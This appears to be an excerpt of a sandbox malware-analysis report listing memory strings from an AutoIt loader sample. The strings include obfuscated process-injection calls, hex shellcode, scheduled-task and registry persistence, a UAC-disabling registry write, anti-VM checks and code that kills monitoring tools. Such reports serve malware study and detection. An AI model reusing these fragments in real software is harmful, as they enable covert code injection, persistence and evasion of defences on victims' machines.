                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @comspec & ' /c ' & "schtasks /create /sc minute /mo 30 /tn " & $taskname & " /tr" & ' "' & filegetshortname($dir3ctory_path & "\" & $exec) & " " & filegetshortname($dir3ctory_path & "\" & $auex) & '"', "", @sw_hide)memstr_8d54621e-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regwrite("hklm64\software\microsoft\windows\currentversion\policies\system", "enablelua", "reg_dword", "0")memstr_44f006be-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("vboxservice.exe") then2jimemstr_5eea811a-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if drivespacefree("d:\") < 1 and processexists("vmwareuser.exe") thenmemstr_1b8b0259-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if drivespacefree("d:\") < 1 and processexists("vmwareservice.exe") theng4memstr_55e08284-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $startupkey = iniread($settingsfn, $ini_settings, "key", '').vmemstr_1f510b0d-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(11, 0, 0)hkumemstr_3a2c2218-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(10, 0, 0)memstr_1606ee7f-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(9, 0, 0)p0memstr_93aa6083-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(7, 0, 0)qmemstr_4cf25955-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(8, 0, 0)memstr_0f4aa0b9-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if $binary = "" then exit4uumemstr_a78e2066-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("mshta.exe")ememstr_565e2a51-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $inject_net4_regsvcmemstr_cc47f09e-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $inject_net2_regasm7]memstr_736e9aad-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(2, 0, 0)memstr_ae8c008e-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $short = "start.lnk"memstr_4af1ec03-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("regshot.exe")memstr_b260c18d-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $irunflag, $tcontext<memstr_abc9e610-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(6, 0, 0)memstr_d67318c4-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $inject_net2_regsvcmemstr_9ed801e5-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func denario($var92 = "-1")memstr_02cd08e8-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if not $frelocatable thenmemstr_966ff3db-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $context_full = 0x100007$memstr_fca93851-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(101, 1, 0)2memstr_2789c223-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $script = "start.vbs"memstr_e1e24ab3-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(101, 0, 0)lmemstr_5092e576-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("taskmgr.exe")memstr_0daf4a7d-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func mainpe($executename)memstr_d8a50cab-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")memstr_e42f5b83-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process hacker")9-memstr_cf194dd0-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(3, 0, 0)2s3%memstr_cd6fb333-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(5, 0, 0)memstr_c2d7a7d6-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9l%}5memstr_fbb9d4c2-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $inject_tw_u_nk_329l%}5memstr_fcbb7977-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("tcpeye") thenmemstr_eeb8ca5e-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(4, 0, 0)memstr_5332d881-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return seterror(102, 0, 0)memstr_9deda46f-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: elseif $imagic = 523 thenqxmemstr_56600da4-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("taskmgr.exe")mmemstr_edfe7f0f-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $inject_net4_regasmmemstr_5535a6dc-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("tcpeye.exe")y265yd95l6246memstr_3db71ab8-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rtup1 = regread("hkcu64\software\microsoft\windows\currentversion\runonce", $startupkey)lmemstr_e82319ee-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if $startup1 = $install_path & "\" & $install_fomemstr_990f6241-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_allocateexespaceataddress($handlerpro, $paddress, $isize)+memstr_5412128e-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $acall = dllcall("kernel32.dll", "ptr", "virt"&"uala"&"llo"&"cex", "handle", $handlerpro, "ptr", $paddress, "dword_ptr", $isize, "dword", 0x1000, "dword", 64))memstr_d9688e74-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $acall = dllcall("kernel32.dll", "ptr", "vi"&"rtualal"&"loc"&"ex", "handle", $handlerpro, "ptr", $paddress, "dword_ptr", $isize, "dword", 0x3000, "dword", 64))memstr_a735e083-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $acall = dllcall("kernel32.dll", "ptr", "vir"&"tua"&"lalloc"&"ex", "handle", $handlerpro, "ptr", 0, "dword_ptr", $isize, "dword", 0x3000, "dword", 64)memstr_d8744225-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("ntdll.dll", "int", "n"&"tunm"&"apviewo"&"fsection", "ptr", $handlerpro, "ptr", $paddress)memstr_d2aa3485-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $acall = dllcall("kernel32.dll", "bool", "iswow"&"64pr"&"oce"&"ss", "handle", $handlerpro, "bool*", 0)memstr_c0711567-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")/memstr_ae777ec9-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)wmemstr_393d9395-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ssssss = "/x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////"umemstr_04bc1b7e-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//"umemstr_acb16668-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "//8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//"umemstr_70936b45-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "//8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a"umemstr_0f052803-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////"umemstr_ec97cf0e-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8"umemstr_02b788e9-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4"umemstr_e6e021f4-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss &= "ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"memstr_80a1a5f6-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @<xbomemstr_7e826959-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g%(aomemstr_722a9c72-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r332omemstr_c5312abf-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h)haomemstr_d6bad6e1-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s3tt!ngmemstr_313da493-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: leh-t"]mmemstr_739ca6c7-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stpthsomemstr_5aa47df9-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g#haomemstr_3a7fa0fa-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h+>]ymemstr_1d22cd0a-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g#xbomemstr_469dcfc3-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_szy]memstr_83f1576d-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: auex*^tmemstr_8e7ecb4f-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exec8^fmemstr_6726a6b5-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h/b^,memstr_1d5a3fd7-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m'a^/memstr_7cb3e771-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6j^4memstr_c1f2985f-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6yh$omemstr_19d47174-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eh#omemstr_20e766f4-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ax$omemstr_0fbbbf1d-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exec//_imemstr_3b8edabb-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h.$_bmemstr_d5a05f94-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6(x#omemstr_39822b86-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3!m_+memstr_fc8eb4e0-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \*.*x#omemstr_a6faf1f3-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exe_ctmemstr_f4dbe14e-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m.9xgmemstr_248af7d0-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 646xpmemstr_2f46ac43-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 25xsmemstr_5fcd210c-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e($omemstr_ac25c2cc-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @#lx*memstr_48738718-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \*.*qx?memstr_a6eea226-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_szomemstr_07d9be22-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reg_szmemstr_2dbd3589-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: auex*ytmemstr_b09a04f9-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vbldrmemstr_5dbaa3ab-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6zoy)memstr_be270eca-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3udy"memstr_366993c8-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6npy>memstr_02afe547-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gtjy4memstr_923897fd-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dir3ctory_pathmemstr_0210a800-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managermemstr_403109b7-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: comspecmemstr_1b9da727-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: read_uacmemstr_09092b70-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice.exe&zomemstr_d68d4b90-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\runmemstr_3a315f3f-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_current_user\software\microsoft\windows\currentversion\runhzmemstr_071cd9ea-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\runwz0memstr_0a40273a-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdirrzmemstr_6e6f90be-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vbsloadersetmemstr_2c1a5e53-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: key_vbsloadermemstr_fc9fc995-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmcessexists0[}memstr_fdd64b68-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: auexinmemstr_a1f3b784-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vbox.exeistsz[#memstr_6cb5726e-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\runa[memstr_4def25f1-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasknamememstr_a6c5a93c-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: meomrypersistancememstr_b39088a7-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkey_current_user\software\microsoft\windows\currentversion\runmemstr_1f202d76-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disableuacmemstr_882897c1-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vbsloaderset't`memstr_00cbb45f-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d:\espacefreememstr_df89d330-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d:\espacefreeitmemstr_a7b4af61-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptdirtt1memstr_8c641f57-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hkcu64\software\microsoft\windows\currentversion\runstmemstr_a9254601-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hklm64\software\microsoft\windows\currentversion\policies\systemmemstr_b846eb1c-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anti_sandbox_vmmemstr_8b4a7425-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray.exememstr_61fe1ce7-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scriptmemstr_38de9fc1-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anti_botkill*usmemstr_22580a70-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupkey1u~memstr_d3c41a2f-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startup1memstr_0030079e-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shortxmemstr_5a2ef1c9-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exe_c?wmemstr_8d957dfa-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @eewomemstr_fba3a10c-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /trxwbmemstr_bc1d0dc6-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0skhcmrwxmemstr_ca687d2d-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tw^memstr_df616826-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: le6xtmemstr_47f41377-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: auex memstr_6b1ab3a2-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ware' memstr_c815319e-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sw_hidememstr_eb1acfe9-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: auexspmemstr_91e64536-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execupmemstr_991ea283-7
